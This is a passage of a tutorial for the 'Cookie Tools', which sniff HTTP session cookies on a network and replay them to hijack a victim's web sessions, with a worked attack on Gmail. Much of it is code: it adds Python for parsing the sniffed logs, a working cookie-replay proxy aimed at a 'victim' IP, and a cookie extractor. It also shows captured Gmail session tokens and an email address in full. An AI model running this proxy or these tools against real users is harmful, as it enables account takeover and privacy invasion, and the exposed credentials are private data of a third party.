1195641110.984025 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: SID=DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
xenion@gollum:~/dev/cookietools$

Each line in the session file has a time-stamp, which is fairly redundant. This makes it simple to sort (remember to use the -n option to enable "numerical value sorting"!!) the logs of several connections according to their time-stamps. This is an example (take the last value (= the current value) of the cookie named GX):

xenion@gollum:~/dev/cookietools$ cat logz/192.168.1.2-*.session | sort -n | grep "Set-Cookie: GX" | tail -1
1195641110.984025 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
xenion@gollum:~/dev/cookietools$
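The session-file format shown above can be read programmatically as well. The following Python script is an added example and is not part of the Cookie Tools: it parses lines in the `.session` format (a time-stamp followed by a "Link:" or "Set-Cookie:" record), merges lines from any number of files, orders them numerically by time-stamp exactly as the `sort -n` pipeline does, and builds an exposure inventory of which cookie names each domain sent over the wire in the clear, with first/last seen time, count and the most recent value. It separates name from value on the first "=" only, because values such as `S=gmail=...` contain "=" themselves (the vision.sh output further down truncates them to 'S'='gmail'). The sample lines are constructed, with shortened placeholder values.

```python
import re
from collections import OrderedDict

# Constructed sample lines in the cookiesniffer .session format: a time-stamp,
# then a "Link:" or "Set-Cookie:" record. They stand in for two connection
# files concatenated together, so they are deliberately not in time order,
# and the cookie values are shortened placeholders, not real ones.
SAMPLE_SESSION_LINES = [
    "1195641102.446297 Set-Cookie: S=gmail=L0lNcf:gmproxy=aULp; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;",
    "1195641101.239263 Link: http://mail.google.com/mail/channel/bind?VER=5&t=1",
    "1195641101.239263 Set-Cookie: GX=OLDVALUE; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;",
    "1195641110.984025 Set-Cookie: GX=NEWVALUE; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;",
    "1195641113.793000 Set-Cookie: BBCNewsAudience=International; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=co.uk;",
    "1195641105.000000 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;",
    "this line is not in the session format and is skipped",
]

LINE_RE = re.compile(r"^(?P<ts>\d+\.\d+) (?P<kind>Link|Set-Cookie): (?P<rest>.*)$")


def parse_session_line(line):
    """Return (timestamp, kind, payload) for one .session line, or None if the
    line does not have the 'TIMESTAMP Link:|Set-Cookie: ...' shape."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return float(m.group("ts")), m.group("kind"), m.group("rest")


def parse_set_cookie(payload):
    """Split 'name=value; attr=val; ...' into (name, value, attrs).

    Only the first '=' separates the name from the value: a value such as
    'gmail=...:gmproxy=...' contains '=' itself, and splitting on every '='
    is exactly what truncates it to 'gmail' in the vision.sh output."""
    parts = [p.strip() for p in payload.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def cleartext_cookie_inventory(lines):
    """Merge .session lines from any number of files, order them numerically
    by time-stamp (what `sort -n` does in the pipeline above) and summarise,
    per (domain, cookie name), how often the cookie crossed the wire in the
    clear, when it was first and last seen, and its most recent value."""
    records = [r for r in map(parse_session_line, lines) if r is not None]
    records.sort(key=lambda rec: rec[0])          # stable: ties keep file order
    inventory = OrderedDict()
    for ts, kind, payload in records:
        if kind != "Set-Cookie":
            continue
        name, value, attrs = parse_set_cookie(payload)
        key = (attrs.get("domain", "?"), name)
        entry = inventory.setdefault(
            key, {"count": 0, "first_seen": ts, "last_seen": ts, "last_value": value})
        entry["count"] += 1
        entry["last_seen"] = ts
        entry["last_value"] = value
    return inventory


def format_report(inventory):
    """Render the inventory as one line per (domain, name) for reading."""
    out = []
    for (domain, name), e in sorted(inventory.items()):
        out.append("%-16s %-20s seen %dx  first=%.6f last=%.6f  last value=%s"
                   % (domain, name, e["count"], e["first_seen"], e["last_seen"], e["last_value"]))
    return "\n".join(out)


if __name__ == "__main__":
    # With real logs, feed it the lines of every logz/*.session file instead.
    print(format_report(cleartext_cookie_inventory(SAMPLE_SESSION_LINES)))
```

Run against every `.session` file of a run, the report answers the question the `sort -n | grep | tail -1` pipeline answers for one cookie, for all cookies at once: which names, per domain, were observed in cleartext and what the last value seen was.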

How it works

The sniffed packets are handled by libnids, which reconstructs each TCP connection. cookiesniffer also reconstructs already-existing TCP connections by forcibly feeding libnids purpose-built TCP three-way handshakes. Each packet is also handled individually by a set of protocol dissectors. This is done because libnids will not reconstruct TCP connections that have some lost packets (which would therefore cause information loss). This can produce some duplicates in the logs, but that is not a problem: the time-stamps will always indicate the last valid value of each cookie. As written in RFC 2616 (Hypertext Transfer Protocol - HTTP/1.1) section 4.4, the transfer-length of an HTTP message body can be determined in 5 ways. cookiesniffer supports ways 1, 3 and 5 but not 2 ("chunked" transfer-coding) and 4 (media type "multipart/byteranges"). With 2 and 4 the connection state changes from "synchronized" to "desynchronized". Connections return to "synchronized" with the first packet that begins with a valid HTTP message (this situation is called "resynchronization").
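The five ways of RFC 2616 section 4.4 can be written down as a small decision procedure. The following Python code is an added example, not cookiesniffer's own code: `transfer_length_rule` applies the five rules, in the order the RFC gives them, to the head of one HTTP/1.1 message and returns which rule delimits the body and, when the head alone tells, the body length; `cookiesniffer_would_desync` models the statement above that rules 1, 3 and 5 keep the connection synchronized while 2 and 4 desynchronize it. The sample message heads are constructed (the first two reuse headers from the Gmail log above); the "rule 0" result for a body-less request is this example's own label, not an RFC rule number.

```python
# Constructed sample message heads. The first two reuse headers that appear
# in the Gmail log above; the rest are made up to exercise each rule.
SAMPLE_HEADS = {
    "gmail response, Content-Length":
        "HTTP/1.1 200 OK\r\nCache-control: no-cache\r\nContent-Encoding: gzip\r\n"
        "Content-Length: 26\r\nServer: GFE/1.3\r\n\r\n",
    "gmail POST request":
        "POST /mail/channel/bind?VER=5&t=1 HTTP/1.1\r\nHost: mail.google.com\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 35\r\n\r\n",
    "GET request, no body":
        "GET /mail/ HTTP/1.1\r\nHost: mail.google.com\r\n\r\n",
    "chunked response":
        "HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n\r\n",
    "304 with a misleading Content-Length":
        "HTTP/1.1 304 Not Modified\r\nContent-Length: 100\r\n\r\n",
    "byteranges response":
        "HTTP/1.1 206 Partial Content\r\n"
        "Content-Type: multipart/byteranges; boundary=THIS_STRING_SEPARATES\r\n\r\n",
    "close-delimited response":
        "HTTP/1.1 200 OK\r\nServer: GFE/1.3\r\nConnection: close\r\n\r\n",
}


def parse_head(raw):
    """Return (start_line, headers) for the head of an HTTP/1.1 message, i.e.
    everything up to the first empty line. Header names are lower-cased and
    duplicates are joined with ', ' as RFC 2616 section 4.2 allows."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue            # folded or malformed line: ignored here
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return lines[0].strip(), headers


def transfer_length_rule(raw, request_method=None):
    """Apply the five rules of RFC 2616 section 4.4, in order, to one message
    head. Returns (rule, length): length is the body size in bytes when the
    head alone determines it (rules 1 and 3) and None when only the body's own
    framing (2, 4) or the connection close (5) can delimit it. request_method
    is the method of the request this response answers (HEAD matters)."""
    start_line, headers = parse_head(raw)
    is_response = start_line.startswith("HTTP/")
    if is_response:
        fields = start_line.split()
        status = int(fields[1]) if len(fields) > 1 and fields[1].isdigit() else 0
        # Rule 1: 1xx, 204, 304 and answers to HEAD never carry a body,
        # whatever Content-Length says.
        if 100 <= status < 200 or status in (204, 304) or request_method == "HEAD":
            return 1, 0
    # Rule 2: any Transfer-Encoding other than "identity" means chunked framing.
    te = headers.get("transfer-encoding", "").lower()
    if te and te != "identity":
        return 2, None
    # Rule 3: Content-Length gives the transfer-length directly.
    if "content-length" in headers:
        return 3, int(headers["content-length"].split(",")[0].strip())
    # Rule 4: multipart/byteranges delimits itself through its boundary.
    if headers.get("content-type", "").lower().startswith("multipart/byteranges"):
        return 4, None
    # Rule 5: only the server closing the connection ends the body. This cannot
    # apply to requests (section 4.3): a request without Content-Length or
    # Transfer-Encoding simply has no body, reported here as rule 0.
    if not is_response:
        return 0, 0
    return 5, None


def cookiesniffer_would_desync(rule):
    """Model of the statement above: rules 1, 3 and 5 keep the connection
    'synchronized', rules 2 and 4 leave it 'desynchronized' until the next
    packet that starts with a valid HTTP message."""
    return rule in (2, 4)


if __name__ == "__main__":
    for label, head in SAMPLE_HEADS.items():
        rule, length = transfer_length_rule(head)
        state = "desynchronized" if cookiesniffer_would_desync(rule) else "synchronized"
        print("%-40s rule %d  length %-5s  -> %s" % (label, rule, length, state))
```

The order of the checks is the point: a 304 that carries a Content-Length still has no body (rule 1 wins), and a Transfer-Encoding other than identity takes precedence over Content-Length (rule 2 before 3); a dissector that tests Content-Length first will mis-frame both and lose the boundary of the next message on the same connection.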

The analyzers

In the bin/analyzers directory there are some Bash scripts that can help you analyze the cookiesniffer logs quickly. This is a brief description of them:

This is an example run of vision.sh:

xenion@gollum:~/dev/cookiestools$ bin/analyzers/vision.sh logz/
======================== Client 192.168.1.2 ========================

----- Links -----
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=9&SID=B7BBE82A5077EC37&RID=89041&zx=it9k92y1rgwv&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=s6cmkdkein1jmp2a91ddp8yun54n24w
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=1552&SID=B7BBE82A5077EC37&RID=89042&zx=d7qazjopodh6&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=6425&SID=B7BBE82A5077EC37&RID=89043&TYPE=terminate&zx=eh281lp7e4it
link[192.168.1.2] http://bbc.com/
link[192.168.1.2] http://www.bbc.co.uk/?ok
link[192.168.1.2] http://secure-uk.imrworldwide.com/cgi-bin/m?rnd=1195641113793&ci=bbc&cg=0&sr=1280x1024&cd=24&lg=en-US&je=y&ck=y&tz=1&ct=&hp=&tl=BBC%20-%20bbc.co.uk%20homepage%20-%20Home%20of%20the%20BBC%20on%20the%20Internet&si=http%3A//www.bbc.co.uk/%3Fok&rp=
link[192.168.1.2] http://ad.uk.doubleclick.net/adx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=mpu;dcmt=application/x-javascript;sz=250x250;tile=4;ord=59391655229326?
link[192.168.1.2] http://ad.uk.doubleclick.net/adx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=bottom;dcmt=application/x-javascript;sz=468x60;tile=3;ord=59391655229326?
link[192.168.1.2] http://ad.uk.doubleclick.net/adx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=skyscraper;dcmt=application/x-javascript;sz=160x600;tile=2;ord=59391655229326?
link[192.168.1.2] http://ad.uk.doubleclick.net/adx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=top;dcmt=application/x-javascript;sz=728x90;tile=1;ord=59391655229326?
link[192.168.1.2] http://ad.doubleclick.net/noidadx/bbccom.live.site.www/bbc_homepage_int;sectn=nonnews;nnsec=homepage_int;callback=BBCComAds.store;requestId=top;dcmt=application/x-javascript;sz=728x90;tile=1;ord=59391655229326?

----- Cookies -----
hosts[192.168.1.2:] co.uk doubleclick.net google.com imrworldwide.com 

names[192.168.1.2:co.uk] BBC-UID BBCNewsAudience 
values[192.168.1.2:co.uk] 'BBC-UID'='2497244450a76963803bdc1cf0f0a902643cab68609010733b5accb5b3a90ab90Mozilla%2f5%2e0%20%28X11%3b%20U%3b%20Linux%20i686%3b%20en%2dUS%3b%20rv%3a1%2e8%2e1%2e8%29%20Gecko%2f20071004%20Iceweasel%2f2%2e0%2e0%2e8%20%28Debian%2d2%2e0%2e0%2e8%2d1%29'
values[192.168.1.2:co.uk] 'BBCNewsAudience'='International'

names[192.168.1.2:doubleclick.net] id test_cookie 
values[192.168.1.2:doubleclick.net] 'id'='800001136db5ff0'
values[192.168.1.2:doubleclick.net] 'test_cookie'='CheckForPermission'

names[192.168.1.2:google.com] GMAIL_AT GMAIL_LOGIN GMAIL_RTT GMAIL_STAT_PENDING GX S SID TZ __utma __utmc __utmz gmailchat 
values[192.168.1.2:google.com] 'GMAIL_AT'='xn3j37i0ev7wcknl8mwn6svd7dl85s'
values[192.168.1.2:google.com] 'GMAIL_LOGIN'='T1195636734978/1195636734978/1195636738633'
values[192.168.1.2:google.com] 'GMAIL_RTT'='121'
values[192.168.1.2:google.com] 'GMAIL_STAT_PENDING'='/S:a'
values[192.168.1.2:google.com] 'GX'='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
values[192.168.1.2:google.com] 'S'='gmail'
values[192.168.1.2:google.com] 'SID'='DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF'
values[192.168.1.2:google.com] 'TZ'='-60'
values[192.168.1.2:google.com] '__utma'='173272373.1523618165.1195636735.1195636735.1195636735.1'
values[192.168.1.2:google.com] '__utmc'='173272373'
values[192.168.1.2:google.com] '__utmz'='173272373.1195636735.1.1.utmccn'
values[192.168.1.2:google.com] 'gmailchat'='charlieroot69@gmail.com/138671'

names[192.168.1.2:imrworldwide.com] IMRID V5 
values[192.168.1.2:imrworldwide.com] 'IMRID'='R0QHlz699OQAAT@qiAI'
values[192.168.1.2:imrworldwide.com] 'V5'='AStfMFklAAMYVFBNBz4jIz00OQYjK1InHlIk1A??'

xenion@gollum:~/dev/cookiestools$

Dependencies, compilation and execution

The required libraries are libpcap (≥0.7), libnet (≥1.1) and libnids (≥1.20). On Debian you need to install the following packages (same version or later):

To compile, simply run "make" in the top directory of the cookietools. The paths of the executables:

cookieserver

With cookieserver you can impersonate someone else's cookies in your browser, using the cookiesniffer logs, in a few seconds. This attack is also called "side-jacking", "cookie replay attack" and "HTTP session hijacking", but I'm probably missing the most 1337 name :P. It is a problem that has been known for 10 years and still works (all too well).

Usage

The two mandatory parameters are the cookiesniffer log directory and the IP (IPv4 address) of the web user you want to impersonate. Only that user's cookies are considered. This is an example run (impersonating the web user with IP 192.168.1.2, using 'logz' as the cookiesniffer log directory):

xenion@gollum:~/dev/cookietools$ bin/cookieserver/startup.sh logz 192.168.1.2
checking for: socat sed grep egrep cut cat head sort tail uniq 
checking log directory...
Client: '192.168.1.2' Logdir: 'logz'
Cookie Server: 127.0.0.1:8181
tmp files will be generated at each request (slower but dynamic)
Listening...

You can run cookieserver while cookiesniffer is still collecting information from the network: cookie values are updated according to their time-stamps. Optionally you can add a third parameter, the constant string 'static'. This forces cookieserver to generate static information; enable it only when the information you are interested in is constant and does not change over time. This is an example:

xenion@gollum:~/dev/cookietools$ bin/cookieserver/startup.sh logz 192.168.1.2 static
checking for: socat sed grep egrep cut cat head sort tail uniq 
checking log directory...
Client: '192.168.1.2' Logdir: 'logz'
Cookie Server: 127.0.0.1:8181
tmp files will be generated only once (faster but static)
Building tmp files... (logdir: 'logz' client: '192.168.1.2')
Listening...

You can also handle more complex scenarios by modifying the Bash scripts bin/cookieserver/subset.sh and bin/cookieserver/build_tmp.sh. After starting cookieserver, launch your browser and set its HTTP proxy to 127.0.0.1:8181. The recommended browser is Firefox with the SwitchProxy plug-in. Go to the URL http://x, where x can be anything: the resulting HTML page is always the same (generated by cookieserver). This is the structure of the HTML page you should see:

CookieServer
Logdir: 'logz'
Client: '192.168.1.2'
Faking host: x
Cookie hosts (12):
    * google.com
    * ...
Links (21):
    * http://mail.google.com/mail/...
    * ...
Set-Cookies (16):
Set-Cookie: GMAIL_AT=...; path=/; domain=google.com;
Set-Cookie: ...
EOF

A quick description: Logdir and Client are the input parameters, Faking host is the hostname cookieserver is currently faking, Cookie hosts is the list of hosts that have cookies, Links is the list of requested URLs and Set-Cookies is the list of Set-Cookie headers carried in the HTTP headers of the page currently displayed. Visiting exactly the URL 'http://x' sets no cookie, because no logged cookie has a domain matching x and the browser discards a Set-Cookie header whose domain does not match the host it is talking to. But when you visit one of the hosts proposed in the Cookie hosts list, the domain attribute of its cookies matches, and those cookies are set in your browser (overwriting them if they already exist). In the example, visiting the URL http://google.com sets the GMAIL_AT cookie (and the others). Now you can use the cookies you have set simply by restoring the original HTTP proxy configuration in your browser.

How it works

It is a set of Bash scripts implementing a simple HTTP web server. TCP connections are handled with socat. Each HTTP response includes the Set-Cookie headers you see in the Set-Cookies list.

Dependencies and execution

The standard UNIX commands sed, grep, egrep, cut, cat, head, sort, tail and uniq are required. You also need the bash shell and socat, a tool similar to netcat but much more powerful. Using Firefox with the SwitchProxy plug-in is also recommended. The path of the executable:
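The same mechanism written out as an added example in Python, rather than the project's own Bash/socat scripts (this is not Cookie Tools code). It reads `values[client:domain] 'name'='value'` lines in the shape vision.sh prints, keeps only the cookies of one client IP, and answers every proxied request with Set-Cookie headers for the logged domains that are the requested host or one of its parents: that is why http://x sets nothing while http://google.com or http://mail.google.com sets the google.com cookies, and it is what the Gmail replay later in this article relies on. The sample log lines are constructed (values abbreviated from the capture above), the function names are mine, and the small PUBLIC_SUFFIXES set stands in for a real public suffix list: the capture above files the BBC cookies under 'co.uk', and a browser refuses a Set-Cookie whose domain is a public suffix, so those entries are skipped instead of replayed.

```python
"""Minimal cookie-replay proxy in the spirit of cookieserver (added example,
not Cookie Tools code). Log lines, names and the suffix list are assumptions."""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# One vision.sh-style line: values[<client ip>:<domain>] '<name>'='<value>'
VALUES_RE = re.compile(r"^values\[([^:\]]+):([^\]]+)\] '([^']*)'='(.*)'$")

# Tiny constructed stand-in for the Public Suffix List. A browser will not
# accept domain=co.uk, so cookies the sniffer filed under such a key are useless.
PUBLIC_SUFFIXES = {"com", "net", "org", "uk", "co.uk", "it"}


def parse_values(log_text):
    """Return {(client_ip, domain): {name: value}} from vision.sh-style lines."""
    table = {}
    for line in log_text.splitlines():
        m = VALUES_RE.match(line.strip())
        if not m:
            continue  # link[...] / names[...] / hosts[...] lines are ignored
        client, domain, name, value = m.groups()
        table.setdefault((client, domain), {})[name] = value
    return table


def cookies_for(table, client, host):
    """Cookies of `client` whose logged domain is `host` or a parent of it.

    Returns {name: (value, domain)} so the caller can emit the domain attribute."""
    host = host.lower().split(":")[0]
    out = {}
    for (ip, domain), jar in table.items():
        if ip != client or domain in PUBLIC_SUFFIXES:
            continue
        if host == domain or host.endswith("." + domain):
            out.update({n: (v, domain) for n, v in jar.items()})
    return out


def set_cookie_headers(table, client, host):
    """Set-Cookie header values the proxy answers a request for `host` with."""
    return [
        f"{name}={value}; path=/; domain={domain}"
        for name, (value, domain) in sorted(cookies_for(table, client, host).items())
    ]


class ReplayHandler(BaseHTTPRequestHandler):
    table = {}
    client_ip = ""

    def do_GET(self):
        # A browser talking to a proxy sends an absolute URI in the request line.
        host = urlsplit(self.path).hostname or self.headers.get("Host", "")
        headers = set_cookie_headers(self.table, self.client_ip, host)
        body = "\n".join([f"Faking host: {host}"] + headers).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        for h in headers:
            self.send_header("Set-Cookie", h)
        self.end_headers()
        self.wfile.write(body)


def serve(log_text, client_ip, port=8181):
    """Replay the cookies of `client_ip` to any browser proxied through us."""
    ReplayHandler.table = parse_values(log_text)
    ReplayHandler.client_ip = client_ip
    HTTPServer(("127.0.0.1", port), ReplayHandler).serve_forever()


# Constructed sample in vision.sh's format; values are abbreviated.
SAMPLE_LOG = """\
values[192.168.1.2:google.com] 'GMAIL_AT'='xn3j2xo9rptl0x2dpylih9ot3o84x5'
values[192.168.1.2:google.com] 'SID'='DQAAAG4AAADHd05w'
values[192.168.1.2:co.uk] 'BBC-UID'='2497244450a76963'
values[10.0.0.7:google.com] 'SID'='someone-else'
"""

if __name__ == "__main__":
    import sys
    serve(SAMPLE_LOG, sys.argv[1] if len(sys.argv) > 1 else "192.168.1.2")
```

Run it with the victim's client IP as the only argument, point the browser's HTTP proxy at 127.0.0.1:8181 and request http://google.com/; the response body lists the Set-Cookie headers it sent, much like cookieserver's page. Real input comes from cookiesniffer's logs; the project's own scripts also honour the cookies' time-stamps, which this version ignores.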

Let's attack Gmail

As I said in the introduction, Google's services are by default reachable over HTTP, in the clear. Here we take Gmail and its cookies as the example: we analyze them and then use them to carry out the cookie replay attack. Let's go... we run cookiesniffer while checking the mail of a Gmail account:

xenion@gollum:~/dev/cookietools$ mkdir logz
xenion@gollum:~/dev/cookietools$ sudo bin/cookiesniffer -dlogz -i eth0
 + cookiesniffer of The Cookie Tools v0.3 running here!
 + pid: 4427, date/time: 30/11/2007#16:05:42
 + Configuration
   + INPUT
     Packet source: iface 'eth0'
     Force datalink header length: disabled
   + OUTPUT
     Output directory: 'logz'
     Logfile: 'logz/0.txt'
     Save pcap: disabled
     stdout logging: enabled
     Syslog logging: disabled
     Be verbose: disabled
   + SELECT
     Sniff in promiscuous mode: disabled
     Add pcap filter: disabled
   + EXECUTION
     Running as user/group: root/root
     Running daemonized: disabled
   + MISC
     Single packet handling: enabled
 * You can dump stats sending me a SIGUSR2 signal
 * Reading packets...
 ! observing HTTP conn: 192.168.1.2:41434 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41435 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:33376 > 209.85.129.104:80
 ! observing HTTP conn: 192.168.1.2:45717 > 66.249.93.189:80
 ! observing HTTP conn: 192.168.1.2:41438 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41439 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41442 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41441 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41440 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41444 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41443 > 72.14.221.83:80
 ! handling single HTTP pkt: 192.168.1.2:41434 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41445 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41446 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41447 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41448 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41449 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41450 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:33391 > 209.85.129.104:80
 ! observing HTTP conn: 192.168.1.2:33392 > 209.85.129.104:80
 ! observing HTTP conn: 192.168.1.2:37506 > 72.14.221.147:80
 ! observing HTTP conn: 192.168.1.2:41455 > 72.14.221.83:80
 ! observing HTTP conn: 192.168.1.2:41456 > 72.14.221.83:80
--
Caught SIGINT signal (2), cleaning up...
--
 + Status
   Network Packets: 2264
   Active HTTP Connections: 2
   Closed HTTP Connections: 20
   Detected HTTP Connections: 22
   Saved Cookies: 170
   Sync HTTP Connections: 1
   Desync HTTP Connections: 1
   Resync HTTP Connections: 53

xenion@gollum:~/dev/cookietools$
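What the sniffer extracts from each reassembled request, as an added example in Python (this is not the C/libnids code of cookiesniffer): the request line and the Host header give the `link[ip] url` line, and the Cookie header is split into name/value pairs filed under a domain derived from the host. The two-label domain rule is my assumption, chosen because it reproduces what the output on this page shows (mail.google.com under google.com, www.bbc.co.uk under co.uk; the latter is exactly the case where the rule misfires, since co.uk is a public suffix and no browser will accept cookies for it). The request bytes are constructed, with cookie values shortened from the capture. One detail worth keeping: split each cookie on the first '=' only, because values such as S=gmail=... and PREF=ID=... contain '=' themselves; the vision.sh summary further down prints 'S'='gmail' and 'PREF'='ID', cut at the second '=', whereas occurrences.sh and cookieserver's Set-Cookie list carry the full values.

```python
"""Cookie extraction from one HTTP request, cookiesniffer-style (added example,
not Cookie Tools code). Domain rule and sample request are assumptions."""


def registrable_domain(host):
    """Two-label heuristic (assumed): mail.google.com -> google.com.
    It misfires on multi-label suffixes: www.bbc.co.uk -> co.uk."""
    labels = host.lower().split(":")[0].split(".")
    return ".".join(labels[-2:])


def split_cookie_header(cookie_header):
    """'a=1; b=x=y' -> [('a', '1'), ('b', 'x=y')].

    Splits on the FIRST '=' only, so S=gmail=...:gmproxy=... survives intact."""
    pairs = []
    for chunk in cookie_header.split(";"):
        chunk = chunk.strip()
        if not chunk:
            continue
        name, sep, value = chunk.partition("=")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def parse_http_request(raw):
    """Return (method, target, headers) from a raw HTTP/1.x request head.
    Header names are lower-cased; the body, if any, is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return method, target, headers


def sniff(client_ip, raw_request):
    """Log lines (vision.sh shape) for one request seen from client_ip."""
    _method, target, headers = parse_http_request(raw_request)
    host = headers.get("host", "")
    # Proxy-style requests already carry an absolute URI; rebuild it otherwise.
    url = target if target.startswith("http://") else f"http://{host}{target}"
    domain = registrable_domain(host)
    lines = [f"link[{client_ip}] {url}"]
    cookies = split_cookie_header(headers.get("cookie", ""))
    if cookies:
        lines.append(f"names[{client_ip}:{domain}] " + " ".join(n for n, _ in cookies) + " ")
    for name, value in cookies:
        lines.append(f"values[{client_ip}:{domain}] '{name}'='{value}'")
    return lines


# Constructed request; cookie values are abbreviated from the page's capture.
SAMPLE_REQUEST = (
    b"GET /mail/?ui=2&view=cbj HTTP/1.1\r\n"
    b"Host: mail.google.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: GMAIL_AT=xn3j2xo9rptl0x2dpylih9ot3o84x5; "
    b"S=gmail=qceQSU5g:gmproxy=kw6R; PREF=ID=38f52b11:TM=1196435005\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print("\n".join(sniff("192.168.1.2", SAMPLE_REQUEST)))
```

The real tool sees the request only after libnids has reassembled the TCP stream, and it keeps a time-stamp per entry so that cookieserver can prefer the freshest value; both are omitted here to keep the parsing logic in view.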

OK, that's plenty :) let's start the analysis... what are the cookie names?

